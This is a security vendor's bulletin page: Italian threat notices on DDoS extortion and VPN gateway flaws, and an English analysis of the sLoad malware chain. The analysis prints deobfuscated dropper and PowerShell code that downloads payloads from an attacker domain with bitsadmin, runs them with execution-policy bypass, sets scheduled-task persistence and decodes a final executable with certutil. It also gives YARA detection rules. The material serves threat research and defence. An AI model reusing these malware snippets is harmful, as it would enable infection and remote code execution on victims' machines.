Intensificazione Minacce R-DoS

Proto: N041019.

Con la presente Yoroi desidera informarLa riguardo al rilevamento di una recente intensificazione di attività di attacco ai danni di Organizzazioni e Aziende operanti nei settori Finanziari, Intrattenimento e Retail. Nella fattispecie legate a richieste di riscatto a fronte della minaccia di attacchi Denial Of Service (R-DoS).

Ricercatori di terze parti hanno riportato attività emergenti operate da un gruppo criminale che, spacciandosi per il noto APT “Fancy Bear”, minaccia di isolare le reti delle vittime tramite attacchi DoS, richiedendo il pagamento di un riscatto in bitcoin. 

Figura. Esempio Richiesta di Riscatto.

Le informazioni reperite indicano che i cyber-criminali sono in realtà in possesso di strumenti e botnet atti a portare attacchi Distributed Denial of Service nell’ordine delle decine di Gbps. In particolare, risultano utilizzate tecniche di amplificazione su protocolli UDP quali:

Tipicamente, il gruppo criminale lancia i suoi attacchi contro gli indirizzi internet possieduti dell’Organizzazione, non limitatamente ai suoi servizi web esposti. Per questo Yoroi suggerisce di verificare se le eventuali protezioni DDoS in uso coprono opportunamente i sotto-domini e le infrastrutture IT in uso.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro “cyber”. Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Attacchi DDoS “Eurobet”

Proto: N031019.

Con la presente Yoroi desidera informarLa riguardo alla recente attacco ai danni di Eurobet e dei relativi rischi per aziende ed organizzazioni terze. La società di scommesse online è da giorni sotto attacco cyber. Tuttavia, nelle ultime ore, alcune organizzazioni hanno registrato picchi di traffico anomali provenienti proprio dalle reti di Eurobet. Picchi legati a traffico malevolo, di scansione o in volumi tali da creare disservizi.

Le informazioni a disposizione indicano che le reti Eurobet possono essere, in questi giorni, vittima di abuso e  potenzialmente sfruttate per fini malevoli da parte di attaccanti terzi.

Pertanto, in via cautelativa e per un periodo di tempo limitato, suggeriamo di monitorare e valutare i volumi di traffico in ingresso provenienti dalle reti Eurobet e diretti presso le Vostre infrastrutture, di predisporne o richiederne il blocco presso i Vostri Internet Service Provider, qualora il traffico raggiunga volumi potenzialmente dannosi. Di seguito si riportano le reti Eurobet potenzialmente interessate dagli abusi:

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Gateway VPN Sotto Attacco

Proto: N021019.

Con la presente Yoroi desidera informarLa riguardo alla scoperta di operazioni di attacco in corso volte alla compromissione di Organizzazioni in tutto il mondo. Gli attacchi, osservati dal National Cyber Security Centre britannico (NCSC), risultano operati da attori di minaccia avanzati e sfruttano gravi vulnerabilità in Firewall e VPN Gateway prodotti da Pulse Connect Secure, Fortinet e Palo Alto. Inoltre, parte del codice utilizzato per gli attacchi a tali vulnerabilità è stato rilasciato pubblicamente.

Le principali vulnerabilità sfruttate durante le operazioni di attacco risultano essere:

I Produttori hanno, nei mesi trascorsi, rilasciato opportuni bollettini di sicurezza atti a risolvere le problematiche, ad esempio SA44101 di Pulse Secure, PAN-SA-2019-0020 di Palo Alto e FG-IR-18-384 di Fortigate (rif. EW N030719, N010919).

Pertanto, Yoroi consiglia di verificare lo stato di aggiornamento degli eventuali gateway potenzialmente afflitti dalle problematiche in uso presso le Vostre organizzazioni, qualora le patch di sicurezza non risultino installate Yoroi suggerisce di valutare una investigazione sui log dei dispositivi per appurare l’assenza di compromissioni in corso.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

The sLoad Threat: Ten Months Later

Introduction

SLoad (TH-163) is the protagonist of increasing and persistent attack waves against the Italian panorama since Q3 2018 and then in 2019 (e.g N020419, N040619, N010819), but also against the UK and Canada as reported by Proofpoint. Ten months ago, we wrote about the complex infection chain the sLoad malware threat was using during its attack campaigns, and today we are looking at the evolution of the threat by dissecting one of its latest attacks.

During our CSDC monitoring operation, we recently noticed some changes in the infamous attack waves related to sLoad, which is known for adopting a complex infection chain using to spread additional malware. For this reason Cybaze-Yoroi ZLAB dissected one latest ones.

Technical Analysis

According to CERT-PA investigations, the malware has recently been delivered using legit certified emails (PEC). These recent attack waves were targeting Italians Organizations and   consultants affiliated to Professional associations, such as lawyers and civil engineers. Once again the attachment is a malicious zip. 

Figure 1: Example of mail (source:CERT-PA)

The Infection Chain

Figure 2: Files contained in attachment file zip

This time the zip does not hide powershell code, such the appended one recovered in the past waves. The archive contains two files: a corrupted PDF file and a VBScript. The first one is designed to deceive the unaware user and force him to open the runnable script.

In the following tables are shown some basic information about samples contained in the zip archive.

Hash30d6f6470e145a1d1f2083abc443148c8e3f762025ca262267ae2e531b2e8ab4
Threat.vbs dropper
Brief DescriptionSload visual basic script loader
Ssdeep192:Fb1TpsF8Z1mZcwfD0VCmA7VETYM/2IVKfCH:FbQjZZfDsA7G2zfCH

Table 1: Information about SLoad .vbs dropper

Hash43db5fcb75d50a5516b687b076be5eb1aaec4b51d8d61a60efc69b383c1d757c
Threat.pdf file
Brief DescriptionSload corrupted pdf file
Ssdeep1536:mmD8g29U+A092Ljr/N0VyvD/ABVqYA7hq4XoZxXjdY4u/dQV:FdLKQjrFgyvsB0YA1q4YZxpWQV

Table 2: Information about SLoad .pdf file

Opening the vbs dropper is possible to see an obfuscated script containing several junk instructions like unused variables and commented codes. After a deobfuscation phase is possible to see the inner logic. The purpose of this script is launch start a powershell script retrieved from the attacker infrastructures and, in the meantime, decoy the victim.

On Error Resume Next
Set ZCzG   = CreateObject("Scripting.FileSystemObject")
Set PavfQt = WScript.CreateObject ("WScript.Shell")
Set XaiX = ZCzG.GetFolder("c:\Users\")
Recurse(XaiX)
PavfQt.run "bitsadmin /transfer OkFCVS /download /priority FOREGROUND https://dreamacinc.com/UCP9dATGyt6mJ/srdzHcN4bWUum.jpg c:\Users\Public\Downloads\RSbYHuPO.ps1",0,True
i=0
Do While i < 1
    If (ZCzG.FileExists("c:\Users\Public\Downloads\RSbYHuPO.ps1")) Then
   	 i=1
    End If
    WScript.Sleep(2280)
Loop
PavfQt.run "powershell.exe -ep bypass -file c:/users/public/downloads/RSbYHuPO.ps1 ",0,True
Sub Recurse(JFLY)
    If IsAccessible(JFLY) Then
   	 For Each oSubFolder In JFLY.SubFolders
   		 Recurse oSubFolder
   	 Next
   	 For Each RIst In JFLY.Files
   		 If InStr(RIst.Name,".pdf") > 0 Then
   			 PavfQt.run "explorer "+JFLY+"\"+RIst.Name
   		 End if
   	 Next
    End If
End Sub
Function IsAccessible(XaiX)
    On Error Resume Next
    IsAccessible = (XaiX.SubFolders.Count >= 0)
End Function

Code snippet 1: Deobfuscated vbs dropper

The malware downloads a fake jpg using the using “bitsadmin.exe”  tool from “hxxps://dreamacinc[.com/UCP9dATGyt6mJ/srdzHcN4bWUum[.jpg”. The usage of native tools allow the script to operate under the radar avoiding several AVs controls. The fake jpg actually contains a powershell script. 

$oLZz2= "C:\Users\admin\AppData\Roaming";
[email protected](1..16);

[...]

$main_ini='76492d1116743f0423413b16050a5345MgB8ADUAVAB4   [...]   AMQAyAGYA';
$main_ini | out-file $PaIQGLoo'\main.ini';

$domain_ini='76492d1116743f0423413b1605   [...]   YwBlAA==';
$domain_ini | out-file $PaIQGLoo'\domain.ini';

[...]

try{ [...]
}catch{$yC0iBerAupzdtf5Z=Get-Process -name powershell*;
    if ($yC0iBerAupzdtf5Z.length -lt 2){
   	 $EXhfbIPG7pUAEZzgZEnM = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
   	 $r=8;
   	 $B3xcDMBF=$EXhfbIPG7pUAEZzgZEnM.Substring(0,$r);
   	 $zjGQzSypyGPthusR = $047MydhkAAfp1W+"\"+$B3xcDMBF;
   	 [email protected](1..16);
   	 $umwTVcIoudRlXjR6yAQQ= Get-Content "main.ini"$MLUkmHrgbpKyVEt8nS= ConvertTo-SecureString $umwTVcIoudRlXjR6yAQQ -key $sv8eJJhgWV3xAN7Uu;
   	 $AKXy3OFCowsfie = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MLUkmHrgbpKyVEt8nS);
   	 $DBR4S3t = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($AKXy3OFCowsfie);
   	 Invoke-Expression $DBR4S3t;
    }
} | out-file $PaIQGLoo'\'$H3z9RnzIihO8'.ps1'

$OFHc0H4A=' /F /create /sc minute /mo 3 /TN "S'+$rs+$fLCg9ngJqRHX36hfUr+'" /ST 07:00 /TR "wscript /E:vbscript '+$PaIQGLoo+'\'+$JxdRWnHC+'.tmp"';
start-process -windowstyle hidden schtasks $OFHc0H4A;   [...]

Code snippet 2: Downloaded powershell code

The first action the script  does is to set a scheduled task to grant persistence on the infected machine. Then, after selection a random active process on infected machine (“System” in this specific infection) and concatenation it with the “%AppData%\Roaming” path, it stores four different files in his installation folder.

All of them are embedded in the script; furthermore, two of them (“domain.ini” and “main.ini”)  are encrypted using the “ConvertFrom-SecureString”  native function. Then, the script runs the “UoqOTQrc.tmp” file, having the only purpose to execute the “UoqOTQrc.ps1” file contained in the same folder.

Figure 3: Files created in “%AppData%\Roaming\<active_process>\”
Dim str, min, max
Const LETTERS = "abcdefghijklmnopqrstuvwxyz"
min = 1
max = Len(LETTERS)
Randomize

[...]

Set objFSO=CreateObject("Scripting.FileSystemObject")
Set winssh = WScript.CreateObject ("WScript.Shell")
fName=RandomString(10)
JAcalshy=RandomString(4)
fZgxNPDMnu=RandomString(4)
WEHxctVdTEoDfqEqJMP=RandomString(4)

[...]

Set objFile = objFSO.CreateTextFile(outFile,8, True)
objFile.Write "Set "+JAcalshy+"=rshe" & vbCrLf
objFile.Write "Set "+fZgxNPDMnu+"=ypa" & vbCrLf
objFile.Write "Set "+WEHxctVdTEoDfqEqJMP+"=il" & vbCrLf
objFile.Close
winssh.run "powershell -ep bypass -file .ps1",0,true

Code snippet 3: content of “UoqOTQrc.tmp” file.

try{
      Remove-EventLog:Debug-Job
      Export-BinaryMiLog:Get-PSSessionConfiguration
      Remove-JobTrigger:New-Item
}catch{
$yC0iBerAupzdtf5Z=Get-Process -name powershell*;
if ($yC0iBerAupzdtf5Z.length -lt 2){
      $EXhfbIPG7pUAEZzgZEnM = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;$r=8;
      $B3xcDMBF=$EXhfbIPG7pUAEZzgZEnM.Substring(0,$r);
      $zjGQzSypyGPthusR = $047MydhkAAfp1W+"\"+$B3xcDMBF;
      [email protected](1..16);
      $umwTVcIoudRlXjR6yAQQ= Get-Content "main.ini"
      $MLUkmHrgbpKyVEt8nS= ConvertTo-SecureString $umwTVcIoudRlXjR6yAQQ -key $sv8eJJhgWV3xAN7Uu;
      $AKXy3OFCowsfie =
              [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MLUkmHrgbpKyVEt8nS);
       $DBR4S3t = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($AKXy3OFCowsfie);
       Invoke-Expression $DBR4S3t;
}

Code snippet 4: content of “UoqOTQrc.ps1” file.

In the same way, the “UoqOTQrc” script decrypts the “mini.ini” file using the “ConvertFrom-SecureString” function and the ecnryption key contained in “$sv8eJJhgWV3xAN7Uu” variable, a sequential integer array. 

Figure 4: “main.ini” file before and after decryption

The decrypted “main.ini” script tries to ping a URL generated selecting three ascii char-codes in ranges [65-90] and [67-122]. Then, it decrypts “domain.ini” using the key in the “$main_key” variable. In the end, it saves the results in the “btc.log” file. Continuing the analysis of “main.ini” is possible to spot that the script also grabs system information to check-in the newly infected host.

Figure 5: “domain.ini” file before and after decryption

Figure 6: Some information exfiltrate by the malware before and after base64 decoding

At this point, another malicious file is downloaded. The malware retrieves it from “hxxps://<C2_URL>/doc/x2401.jpg”. Once again, this is not a real jpg, but rather another obfuscated powershell layer.

$u2K2MQ4 = "`r`n"
$lNlNrKyk= -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})
$yIXgWSaXsKD5hanf9uO= $env:userprofile+'\App'+'Da'+'ta\Ro'+'am'+'ing';
$hh='hi'+'dd'+'en';
[email protected](1..16);
$Erlydjiyy = (Get-WmiObject Win32_ComputerSystemProduct);
$Erlydj = $Erlydjiyy.UUID;
$sOmUGoc0ysV8UW=$Erlydj.Substring(0,6);
$Z5lTNXB = $yIXgWSaXsKD5hanf9uO+"\"+$sOmUGoc0ysV8UW;
If(!(test-path $Z5lTNXB)){New-Item -ItemType Directory -Force -Path $Z5lTNXB}

If(test-path $Z5lTNXB"\_in"){$gQd0DB82ByQ0pziwKZ=Get-ChildItem $Z5lTNXB"\_in";$FQDO2rSjJJxrkrYFWM1W = Get-Date;if ($gQd0DB82ByQ0pziwKZ.LastWriteTime -gt $FQDO2rSjJJxrkrYFWM1W.AddMinutes(-30)){break;break;}}; "1" | out-file $Z5lTNXB"\_in";

try{ Remove-Item $Z5lTNXB'\*'}catch{}

$wsxDITPgQCH+='76492d1116743f0423413b16050a5345MgB8AGsAKwBwAHkASQBUAGgAWgBKAEsAbgBFAE8AUQBHA';
[...]
$wsxDITPgQCH+='UAZAA1AGIAZAA0ADIAYgBkAGUANQAzADIAYgBkAGIAMwBlADMAZQA1ADAAOQA3ADgAYwAyAGYAMgA';
$wsxDITPgQCH+='3ADAANQA1AA==';
$wsxDITPgQCH | out-file $Z5lTNXB'\config.ini';
$5r8DcJB4ok4+='76492d1116743f0423413b16050a5345MgB8AHQAYgBqAFYAVQBQADUAQwBNAGEAZABWAFMA';
[...]
$5r8DcJB4ok4+='YQBiADUAOAAzAGQANAAxADgAMwAxAGYANQAwAGIA';
$5r8DcJB4ok4 | out-file $Z5lTNXB'\web.ini';
start-process -windowstyle $hh schtasks '/change /tn GoFast /disable';
$2aWxu9dutZfOPCCgS+=$u2K2MQ4+'Dim  ';
[...]
$nz0oninX6=$ixXApGeqJKEGY -join ',';
$E6M6Np8nhXnu4ndPEJ=' /F /create /sc minute /mo 3 /TN "U'+$sOmUGoc0ysV8UW+'" /ST 07:00 /TR "wscript /E:vbscript '+$Z5lTNXB+'\'+$lNlNrKyk+'.tmp"';
start-process -windowstyle $hh schtasks $E6M6Np8nhXnu4ndPEJ;

Code snippet 5: Obfuscated content of “x2401.jpg” file.

$u2K2MQ4 = "rn";
$lNlNrKyk= -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_});
$yIXgWSaXsKD5hanf9uO= $env:userprofile+'\AppData\Roaming';

$Erlydjiyy = (Get-WmiObject Win32_ComputerSystemProduct);
$Erlydj = $Erlydjiyy.UUID;
$sOmUGoc0ysV8UW=$Erlydj.Substring(0,6);
$Z5lTNXB = $yIXgWSaXsKD5hanf9uO+"\"+$sOmUGoc0ysV8UW;
If(!(test-path $Z5lTNXB)){New-Item -ItemType Directory -Force -Path $Z5lTNXB}

If(test-path $Z5lTNXB"\_in"){$gQd0DB82ByQ0pziwKZ=Get-ChildItem $Z5lTNXB"\_in";$FQDO2rSjJJxrkrYFWM1W = Get-Date;if ($gQd0DB82ByQ0pziwKZ.LastWriteTime -gt $FQDO2rSjJJxrkrYFWM1W.AddMinutes(-30)){break;break;}}; "1" | out-file $Z5lTNXB"\_in";

try{ Remove-Item $Z5lTNXB'\*'}catch{}
$wsxDITPgQCH="76492d1 [...] A1AA==";
$wsxDITPgQCH | out-file $Z5lTNXB'\config.ini';

$5r8DcJB4ok4="7649 [...] AGIA";
$5r8DcJB4ok4 | out-file $Z5lTNXB'\web.ini';

start-process -windowstyle hidden schtasks '/change /tn GoFast /disable';

$2aWxu9dutZfOPCCgS="Dim  winssh [...] winssh.run "powershell -ep bypass -file vJjFwtSM.ps1",0,true";
$2aWxu9dutZfOPCCgS | out-file $Z5lTNXB'\'$lNlNrKyk'.tmp'

$r1uIiPZBhUea0=" $zTxePJtpmbVI0btT6cd9=Get-Process -name powershell*; [...] Invoke-Expression $NLO3lwvn1xWn;}";
$r1uIiPZBhUea0 | out-file $Z5lTNXB'\'$lNlNrKyk'.ps1'

$nz0oninX6="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16";
$E6M6Np8nhXnu4ndPEJ="/F /create /sc minute /mo 3 /TN "U52A34D" /ST 07:00 /TR "wscript /E:vbscript C:\Users\admin\AppData\Roaming\52A34D\vJjFwtSM.tmp";

start-process -windowstyle hidden schtasks $E6M6Np8nhXnu4ndPEJ;

Code snippet 6: Deobfuscated content of “x2401.jpg” file.

Like previous script, this one perform the same operations and create other four file in “%AppData%\Roaming\<active_process>” path. This time the files are:

Figure 7: Files created in “%AppData%\Roaming\<active_process>\”

The first executed file is “<random_name>.tmp”. It is not obfuscated and its only purpose is the execution of “<random_name>.ps1”. The content of “<random_name>.ps1” file is the following. The latest script decrypt the content of “config.ini” file. The following figure shown both encrypted and decrypted “config.ini” file.

Figure 8: Files created in “%AppData%\Roaming\<active_process>\”

This script performs the same operation described in “main.ini” file but use different URLs stored in the “web.ini” file. Also this time, the file is decrypted using an integer array from 1 to 16  as key and contained in “$mainKey” variable.

Figure 9: “web.ini” file before and after decryption

Finally, it tries to download the final payload with the following piece of script. However, at the time of analysis, all the C2 URLs seems to be down, so we are not able to detect the final payload family. 

$dPath = [Environment]::GetFolderPath("MyDocuments")
$jerry=$starsLord+'\'+$roccon+'_'+$rp;   		 
$clpsr='/C bitsadmin /transfer '+$rp+' /download /priority FOREGROUND '+$line+' '+$jerry+'.txt & Copy /Z '+$jerry+'.txt '+$jerry+'_1.txt & certutil -decode '+$jerry+'_1.txt '+$dPath+'\'+$roccon+'_'+$rp+'.exe & powershell -command "start-process '+$dPath+'\'+$roccon+'_'+$rp+'.exe" & exit';
start-process -wiNdowStylE HiddeN $mainDMC $clpsr;
$clpsr='/C del '+$jerry+'.txt & del '+$jerry+'_1.txt & del '+$dPath+'\'+$roccon+'_'+$rp+'.exe & exit';
start-process -wiNdowStylE HiddeN $mainDMC $clpsr;

Code snippet 7: script to download the final payload

Comparison With Previous Chains

To better understand the evolution of sLoad infection chain, we compared attack attempts observed since 2018 and the latest ones. In both cases, the infection vector is a carefully themed malicious email, weaponized with zip archive containing two files. In the first case the starting point is a “.lnk” file and in the second one the chain starts with a “.vbs” script. 

The sLoad attack chain observed months ago was characterized by some pieces of powershell code appended to the tail of the zip archive. Probably, this technique become more detectable during the time, so it could have been deprecated in latest infections attempts. For both malware variants, the archive contains a legit image (or pdf) used to deceive the unaware user. Moreover, in the first analyzed variant, the core of the infection is mainly based on powershell scripts and LOLbins. However, the latest stages uses a mix of Powershell and Visual Basic Scripts.


Figure 10: Infection chain workflow

The agent body is still quite similar in the core structure, however the bot now supports new commands such as “Exec” and “Eval”, the latter is able to download further code through the Bitsadmin utility instead of directly rely on “Net.WebClient” primitive. Also, the “ScreenCapture” function have been removed from the new version of the code, in favor to the enhancement of the agent persistence through scheduled task.

Figure 11: Comparison between old and new version on “config.ini” file

Conclusion

sLoad is keeping evolving their TTPs and represents a vivid threat for the Italian cyber-panorama. Also, many times, especially during the last months, its activities in the country involved the abuse of certified mailboxes (PEC) targeting associated professionals and consultants, along with private companies. Additionally, the quality of the latest phishing emails is high: the group adopted templates and naming conventions actually in use by  Italian Revenue Agency (“Agenzia delle Entrate”).

The plentiful usage of LOLbins, Powershell scripts and SSL encrypted channels, makes detection of this threat difficult for automated systems, and frequently requires analysis abilities or high quality threat intelligence sources to detect and tackle sLoad attack campaigns, many times targeting just a single country.

Indicator of Compromise

Yara Rules

rule SLoad_Sep_2019{
	meta:
  	description = "Yara Rule for Sload campaign 2019"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019-09-27"
  	tlp = "white"
  	category = "informational"

	strings:
   	 $s1 = {50 4B}
   	 $s2 = {29 7B 0A 33 9D B6 C7 BF}
   	 $s3 = {E7 D5 53 78 3A BD}
   	 $a1 = "IT83440018268.vbs" ascii wide
   	 $a2 = "IT83440018268.pdf" ascii wide
   	 
    condition:
   	 all of ($s*) and 1 of ($a*)
}

rule sload_Sep_2019{
	meta:
  	description = "Yara Rule for Sload vbs script sept 2019"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019-09-27"
  	tlp = "white"
  	category = "informational"

	strings:
   	 $s1="ZCzG.GetFolder(\"c:\\Users\\\")"
   	 $s2="WScript.Shell"
   	 $s3="https://dreamacinc.com/"
   	 $s4="bitsadmin"
   	 
    condition:
   	 all of them
}

This blog post was authored by Davide Testa and Luca Mella of Cybaze-Yoroi Z-LAB

Campagna di Attacco Emotet+Ursnif

 Proto: N011019.

Con la presente Yoroi desidera informarLa riguardo alla scoperta di una pericolosa campagna di attacco in corso ai danni di utenti ed Aziende italiane. I messaggi di posta fraudolenti invitano le vittime all’apertura di documenti capaci di scaricare e mettere in esecuzione un impianto della famiglia Emotet (TH-168). A seguito dell’infezione, è stata osservata inoltre l’installazione di ulteriore malware della famiglia Ursnif: minaccia in grado di intercettare digitazioni da tastiera, trafugare le password salvate ed alterare la navigazione web utente.

Figura. Esempio documento malevolo

Di seguito si riportano gli indicatori di compromissione identificati durante le analisi condotte:

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index